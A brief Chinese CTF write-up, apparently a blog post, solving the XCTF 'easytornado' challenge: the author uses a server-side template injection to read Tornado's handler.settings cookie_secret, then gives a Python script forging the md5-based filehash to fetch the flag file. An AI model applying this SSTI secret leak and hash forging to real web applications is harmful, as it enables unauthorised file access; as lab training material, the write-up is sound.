XCTF的easytornado題目

py是個好工具,要多加以利用
在這裏插入圖片描述在這裏插入圖片描述在這裏插入圖片描述![在這裏插入圖片描述](https://img-blog.csdnimg.cn/20200707170254527.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2RhcWlhbmdkZXRpYW54aWE=,size_16,color_FFFFFF,t_70

經過分析。看到題目的關鍵點在於找到cookie_secret.
於是想到兩種方法:
1. 利用彩虹表通過反向找到coookie_secret的內容
2. 是否存在ssti漏洞,可以直接找到cookie_secret文件
嘗試一些後發現存在ssti漏洞
在這裏插入圖片描述看別人的writeup,發現handler.settings能夠找到,於是
在這裏插入圖片描述
然後用python用md5加密文件

import hashlib


cookie_secret='3321c76a-3b14-4d5a-8b61-98944f97fd29'
#hashlib.md5(cookie_secret+md5(filename))
k=cookie_secret+hashlib.md5('/fllllllllllllag'.encode(encoding='UTF-8')).hexdigest()
m=hashlib.md5(k.encode(encoding='UTF-8')).hexdigest()
print(m)

然後通過得出的m輸入到filehash後面,得到flag。
file?filename=/fllllllllllllag&filehash=

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章